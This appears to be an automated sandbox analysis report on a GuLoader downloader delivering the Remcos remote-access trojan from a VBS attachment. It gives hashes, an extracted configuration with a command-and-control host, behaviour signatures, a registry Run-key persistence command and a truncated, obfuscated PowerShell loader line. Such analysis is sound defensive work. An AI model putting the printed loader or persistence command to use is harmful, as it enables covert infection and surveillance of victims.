guloader | 2d343c091484eac696a23418f04df81c35bc538a10d25193ad014d11c4422907

Analysis

max time kernel
299s
max time network
294s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
06-06-2023 14:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GrigoropoulosLaw-294029 poundage 2023-06-06 .vbs
Size

1011KB
MD5

054d7758f5e6b9f32ade32db3a179f28
SHA1

25694ce4b67c85ec7fcac268133bf6fdedef7da6
SHA256

2d343c091484eac696a23418f04df81c35bc538a10d25193ad014d11c4422907
SHA512

8147bfbbcee51a01ba2c9501570cc28ff1f18bb86aa7931646736c9bea98a984123242c2ed84accf6a45ceacf65ea4eb5837625c56321c18e9a04c0c718c79de
SSDEEP

6144:CIxIxIxIxIxIxIxIxIxICe05+M7U/Tk/aE9HWxsKXHWxsKXHWxsKXHWxsKXHWxsF:0EtMMMMMMMMMM5

Score

10^/10

guloader remcos adobepdf downloader persistence rat

Malware Config

Extracted

Family

remcos

Botnet

AdobePDF

apdfhost.online:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-X1WV4F
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 4344 powershell.exe

flow	pid	process
9	4344	powershell.exe

Checks QEMU agent file 2 TTPs 8 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exepowershell.exepowershell.exeieinstal.exeieinstal.exepowershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeCScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	CScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Billiggr160 = "%Bare% -w 1 $Salato=(Get-ItemProperty -Path 'HKCU:\\Urtsbeds\\').Outreckonl;%Bare% $Salato"	ieinstal.exe

Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs

Processes:

ieinstal.exeieinstal.exeieinstal.exeieinstal.exe

pid process

4796 ieinstal.exe
2528 ieinstal.exe
2820 ieinstal.exe
564 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

powershell.exeieinstal.exepowershell.exepowershell.exeieinstal.exeieinstal.exepowershell.exeieinstal.exe

pid process

4344 powershell.exe
4796 ieinstal.exe
2144 powershell.exe
1160 powershell.exe
2528 ieinstal.exe
2820 ieinstal.exe
3568 powershell.exe
564 ieinstal.exe

pid	process
4796	ieinstal.exe
2528	ieinstal.exe
2820	ieinstal.exe
564	ieinstal.exe

pid	process
4344	powershell.exe
4796	ieinstal.exe
2144	powershell.exe
1160	powershell.exe
2528	ieinstal.exe
2820	ieinstal.exe
3568	powershell.exe
564	ieinstal.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4344 set thread context of 4796	4344	powershell.exe	ieinstal.exe
PID 2144 set thread context of 2528	2144	powershell.exe	ieinstal.exe
PID 1160 set thread context of 2820	1160	powershell.exe	ieinstal.exe
PID 3568 set thread context of 564	3568	powershell.exe	ieinstal.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 2 IoCs

Processes:

ieinstal.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings	ieinstal.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

4696 NOTEPAD.EXE

pid	process
4696	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3244	powershell.exe
3244	powershell.exe
4344	powershell.exe
4344	powershell.exe
2540	powershell.exe
2540	powershell.exe
2144	powershell.exe
2144	powershell.exe
3872	powershell.exe
3872	powershell.exe
3872	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1684	powershell.exe
1684	powershell.exe
3568	powershell.exe
3568	powershell.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

4344 powershell.exe
2144 powershell.exe
1160 powershell.exe
3568 powershell.exe

pid	process
4344	powershell.exe
2144	powershell.exe
1160	powershell.exe
3568	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

636 AcroRd32.exe

Suspicious use of SetWindowsHookEx 19 IoCs

Processes:

AcroRd32.exeOpenWith.exe

pid	process
636	AcroRd32.exe
636	AcroRd32.exe
636	AcroRd32.exe
636	AcroRd32.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe
4348	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exepowershell.exeieinstal.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 3756 wrote to memory of 2032	3756	WScript.exe	cmd.exe
PID 3756 wrote to memory of 2032	3756	WScript.exe	cmd.exe
PID 3756 wrote to memory of 564	3756	WScript.exe	cmd.exe
PID 3756 wrote to memory of 564	3756	WScript.exe	cmd.exe
PID 3756 wrote to memory of 3244	3756	WScript.exe	powershell.exe
PID 3756 wrote to memory of 3244	3756	WScript.exe	powershell.exe
PID 3244 wrote to memory of 4344	3244	powershell.exe	powershell.exe
PID 3244 wrote to memory of 4344	3244	powershell.exe	powershell.exe
PID 3244 wrote to memory of 4344	3244	powershell.exe	powershell.exe
PID 4344 wrote to memory of 4796	4344	powershell.exe	ieinstal.exe
PID 4344 wrote to memory of 4796	4344	powershell.exe	ieinstal.exe
PID 4344 wrote to memory of 4796	4344	powershell.exe	ieinstal.exe
PID 4344 wrote to memory of 4796	4344	powershell.exe	ieinstal.exe
PID 4796 wrote to memory of 636	4796	ieinstal.exe	AcroRd32.exe
PID 4796 wrote to memory of 636	4796	ieinstal.exe	AcroRd32.exe
PID 4796 wrote to memory of 636	4796	ieinstal.exe	AcroRd32.exe
PID 636 wrote to memory of 5116	636	AcroRd32.exe	RdrCEF.exe
PID 636 wrote to memory of 5116	636	AcroRd32.exe	RdrCEF.exe
PID 636 wrote to memory of 5116	636	AcroRd32.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 4140	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 2524	5116	RdrCEF.exe	RdrCEF.exe
PID 5116 wrote to memory of 2524	5116	RdrCEF.exe	RdrCEF.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GrigoropoulosLaw-294029 poundage 2023-06-06 .vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir
2⤵
PID:2032

C:\Windows\System32\cmd.exe
cmd /c dir&echo ###RSHELL.EXE###
2⤵
PID:564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD 0BDt0 5A0 5T'P; `$ e h rFlS6 = I n cRlP1T1 S'G2 7j1cD 3h9S1 BS0 6 1 DI0 Cn0 AE1BD 3VFU0 0B1AB 1SDC1 C 0S8S0 5 2G4R0 CA0D4N0S6G1 BB1 0 ' ;D`$UeUhSr l 7 =FIFn cMl 1B1I ' 2U0 2 CT3L1u'R;F`$SeGh r l 8a=AISn cLl 1S1 ' 3 5S' ; `$ SDo rDoS= I nHcFlU1T1 B' 3rC 3RA 2SCR3CBW5SAA5 BI'Z; `$BI mUmmaSnP=BIEn cAl 1D1A V' 2bA 0 8 0T5T0 5T3 EK0L0F0C7O0 DL0 6 1 E 3 9E1CB 0r6G0UAS2 8S'T; f uLn cPtWi o n OfDkVpF M{uPRaFr a m (S`$ R o mBaUn ,S K`$CMRa k aUrSoCnAiBeD)P S F L C;A`$ETIrUoSt h e dF0R = I n c lN1h1 ' 4GD 2CFV0RCS1AB 0r4Y4G9R5 4S4F9 4V1 3K2G2 8V1B9 1 9P2IDT0A6C0 4G0 8 0D0 0 7H3T4U5 3 5 3S2 A 1 C 1 BF1 BI0aC 0F7 1MD 2vD 0T6H0B4 0L8 0 0A0s7 4N7 2BE 0 C 1fDF2T8S1IAS1MAP0lCT0 4N0CB 0 5H0 0D0dC 1RAr4P1S4 0 4 9 1 5M4F9 3PE 0B1U0UC 1 BH0 CB4 4H2A6s0 Bo0 3K0RC 0LA 1rDP4L9 1 2R4 9 4 DN3 6U4L7B2LEI0O5M0Y6L0BBC0H8 0S5T2U8B1PAK1RAB0sCv0E4A0PB 0R5D1 0M2sA 0S8 0DA 0R1 0FC 4D9 4B4 2P8R0 7E0SDS4A9 4AD 3M6 4M7 2B5a0T6 0 AD0T8N1 DU0C0P0A6M0t7U4 7 3 Af1B9U0 5T0 0M1RDT4 1d4KDr0BC 0A1H1MBs0 5s5V1P4 0 3 2N4D4r5 8A3C4S4 7T2TCs1S8e1RCH0 8 0 5B1 A 4 1L4 DF2B4P0 8P1 D 0 CT0 4 0 8 5K9B4F0T4 9I1 4v4C0H4U7 2 EP0 Cm1 D 3PDP1R0R1B9 0 C 4O1M4JD 2 4E0L8C1BD 0 C 0R4 0o8F5 8 4N0 ' ;V.I(K`$oePh rSl 7 )U S`$ATlrNoPtIhNeBdl0S;S`$ T rLoLt hWeBdu5 P=C kIPnZc l 1L1V ' 4 DO2F4 0M0K0M5 0 0O4L9 5 4 4 9G4GDH2TFM0 CD1 BE0P4 4P7 2 ED0 CA1UD 2L4 0ACG1ED 0 1O0 6 0BDD4 1M4HDN2D4S0S8 1AD 0aCM0S4D0 8P5JB 4V5S4K9t3T2 3FDM1S0 1 9K0PC 3K2 3 4 3G4 4 9N2S9D4M1 4AD 2A4S0 8A1 DS0CC 0 4 0 8 5 Ak4H5r4R9 4DDN2F4A0S8 1ADB0AC 0I4 0B8t5 D 4 0H4K0 ' ;D. ( `$KeGhPr l 7 ) `$STPrno tSh eSd 5I;H`$ TVrMoGtDh e dL1B =K FIBnKcClB1i1 U'B1ABL0TCL1ADR1 C 1SB 0T7P4 9 4BDH2 4S0 0 0E5u0l0 4I7 2S0 0S7E1DFS0C6 0I2C0BC 4F1 4RDP0 7M1SCB0M5D0F5S4 5S4T9 2 9 4S1G3P2 3kAV1M0A1SAC1GDU0cC 0V4 4s7L3 BE1 CP0d7S1KDM0 0P0 4D0WC 4d7M2 0F0 7 1OD 0 CP1 BS0W6T1 9P3WAR0LCA1 BB1GFC0L0D0IA 0 CD1pAO4 7F2A1 0S8 0I7o0 D 0M5 0 C 3BBF0 Cr0AF 3A4m4t1F2F7 0 C 1 E 4O4 2I6 0 BA0G3 0NC 0OAs1 DB4F9T3 AM1 0R1LAP1MDF0LCe0B4B4 7 3ABC1 CS0U7 1SD 0 0T0s4 0 CK4L7b2K0P0G7L1ADU0RCS1TB 0B6K1E9D3MA 0 CH1AB 1FFN0 0J0 A 0GCA1 AB4 7 2 1A0S8D0E7s0 DC0E5E0 CH3 BE0OCK0PF 4 1 4T1B2A7N0FC 1 EH4f4H2P6H0 BD0S3s0BCA0 A 1 DC4U9 2r0a0 7a1TDF3 9F1 D 1 BR4 0R4 5O4R9 4M1r4SDA2IF 0 C 1 B 0 4e4S7 2UET0LC 1PDB2M4S0hC 1 D 0D1R0W6 0iDP4 1p4PDS2 4 0F8R1eD 0HC 0S4 0 8 5 Cg4 0R4 0M4 7E2 0T0 7R1 FD0b6 0T2S0DC 4 1F4PDA0s7 1PCP0U5 0K5 4T5 4 9 2C9G4G1 4FDI3VB 0 6S0U4 0U8U0A7T4 0 4S0 4 0 4 0 4b5G4P9V4 DT2T4l0 8 0 2T0 8 1HBK0 6P0E7 0 0 0FCH4L0 4 0L' ;g.J(U`$ eTh rDlM7 )C p`$GT rMoDtth eAdT1t;L} f uUnHc tAi o nL G D T L{ P aHrSaKm (O[RP aDrcaSm eKtFeDr ( P o s iAt iSoCnH T=l i0B,S MVa n dBa tHo r y T= U`$NT rIume )k]P S[KT yfpGeS[ ] ]F `$ ISlTd e rPe mM,T[FPPaPrsaFmBeJtDe r (SPUoLsRi tSi o nN B= 1 ) ] A[ T yPpCeR] L`$ GAl aCsSs lBi b e =S A[SVSo iFdH]M)L;t`$TTPrCoStLhUe dP2 = DI nVcSl 1 1t f' 4 DH2BAN0 6o0 C 0 5S0 8L1 AD1 DB1EBP4K9P5N4E4 9 3B2S2S8 1P9 1R9A2 DF0T6 0T4H0R8S0 0 0 7 3F4 5 3 5d3 2 AM1BCS1bB 1 BT0 CF0F7 1MD 2HDO0i6V0K4 0S8M0A0P0 7F4 7 2MDB0AC 0SFU0C0I0R7 0DC 2PDI1S0 0 7N0 8m0T4 0D0B0KAP2U8 1dAT1TA 0 CS0A4E0GBC0N5A1H0 4W1 4 1 2B7F0 CF1dEU4 4T2M6F0 Bt0E3 0JCE0 AB1 D 4t9M3 AB1G0U1 A 1 D 0 C 0 4F4R7H3EB 0 CD0FFJ0F5 0SCS0SAF1PD 0U0 0A6O0 7P4 7 2p8K1SAC1BAD0 CS0G4 0 BD0F5S1F0 2P7 0 8r0 4N0FC 4l1 4 D 2V4 0I8C1 D 0BC 0 4S0 8 5N1S4A0M4P0H4 5 4m9N3B2C3TAV1 0G1 AA1GDS0 C 0G4v4G7K3 BA0ACO0EF 0 5 0 CS0FAC1ID 0 0k0U6U0 7 4 7B2 C 0M4 0D0O1 D 4C7D2E8 1 AE1 A 0gC 0 4O0 Bl0K5I1 0R2SBM1FCT0d0W0 5T0QD 0 CS1 B 2P8 0CAM0 AB0 CE1IAR1tA 3N4M5 3O5b3 3MBY1 C 0u7f4U0 4 7 2SD 0ACT0DFF0U0N0 7G0PCS2SDE1E0S0D7 0d8 0 4 0 0P0TAA2S4L0T6T0BD 1RCS0S5S0KCE4F1Q4BD 2C4P0S8D1RDs0ACR0 4k0L8U5I0 4L5S4F9 4SDS0 FH0S8O0S5G1 A 0 CB4 0U4E7D2CDK0 C 0 FU0P0T0d7 0 C 3CDL1W0 1H9 0 C 4G1S4TD 0 CA0F1B1VB 0 5 5T9U4C5P4A9W4 D 0WCK0D1L1 BT0 5B5D8 4B5D4N9F3 2T3CA 1b0 1 A 1SD 0SCQ0 4M4K7A2 4A1 CM0m5 1DD 0M0L0FAD0A8 1 A 1 D 2 DO0 CA0K5P0mC 0UEU0 8 1FDT0 CM3U4O4 0A'F;S.S( `$ReCh rJl 7P) P`$WTHr oWtKhSe d 2S; `$ TorDoUt hLeBdC3C = I nSc lL1 1 R'S4 DP2BA 0S6I0LCL0P5 0F8 1BA 1TD 1 BD4R7L2 D 0CC 0TFV0 0T0 7 0WCA2 AS0M6 0f7O1 AF1OD 1UB 1nC 0FAE1LDB0D6U1HBF4C1e4 D 2 4V0 8p1CD 0PCB0L4 0b8F5SF 4T5 4S9 3T2 3PA 1J0 1SAU1WD 0 CS0S4K4V7 3HB 0aCC0 F 0 5S0 CF0PAE1 D 0C0 0 6 0 7Z4 7 2 A 0 8T0 5A0D5 0 0 0S7G0BET2 AO0P6F0 7M1 F 0CC 0 7T1 DQ0 0R0M6N0M7 1PAf3 4T5C3 5 3K3 A 1 Dm0e8 0 7B0RD 0U8j1 BR0LDP4B5H4B9 4VD 2 0R0 5S0BDM0NCC1 B 0 C 0U4 4S0O4 7D3KAd0BC 1oD 2K0 0D4R1l9 0 5O0ECS0U4 0 CI0 7 1 DD0 8F1AD 0A0D0F6A0O7 2OFT0H5R0 8 0UEF1FA 4 1 4MD 2M4T0S8H1 D 0SC 0 4 0D8 5ME 4s0 ' ; .b(S`$ eNhBr lR7H)P T`$ T r o tChpeBd 3N; `$ T r oTtUhSeAdP4R G= MISn c l 1S1B D'K4EDr2EAb0 6 0 C 0 5i0 8E1RA 1 D 1SBR4 7P2CDB0 C 0PF 0N0A0 7 0TCD2F4 0FC 1 DG0 1 0V6C0VDC4S1B4 D 0 C 0P1H1 Bk0z5 5TB 4B5 4 9 4 D 0 CR0 1R1IBH0J5S5SA 4L5T4T9K4PD 2 EO0 5 0O8R1 AI1 A 0 5 0 0N0AB 0 CP4P5 4U9 4hD 2 0 0 5P0SDA0 CB1aB 0FC 0 4 4P0 4f7o3BAG0 CB1SDA2 0A0 4S1L9 0M5T0ECu0 4S0 C 0 7M1 DM0 8d1dD 0F0T0A6 0 7 2HFS0p5 0G8O0UEB1 AJ4 1A4 DR2 4s0H8F1MD 0NCR0D4 0W8 5DEK4 0 ' ;V. (T`$ReHhRr lL7E) `$ST rHoBt hAe d 4M;P`$CTDrDoFt h e d 5 F= I nDcBlS1 1f K'F1 B 0OC 1AD 1 CE1 B 0J7 4 9U4ND 2 AK0 6 0 Cs0 5 0P8 1sA 1 DP1SB 4H7B2TAS1 BB0 C 0U8M1EDT0 CM3 DV1C0S1T9L0 C 4 1I4 0B' ;C. ( `$Ae hDrLlM7 )D `$ TTrRo t hRePdB5F ;T} `$AI nSd uC N=L FI nScUlM1G1g A'K0 2 0CCC1BBS0G7 0IC 0i5B5LA 5MBM'T;F`$ I nUc lT0S3 M=R I n cfl 1C1P F'B2SEM0HCN1CDS2 AS0T6B0J7B1 AB0 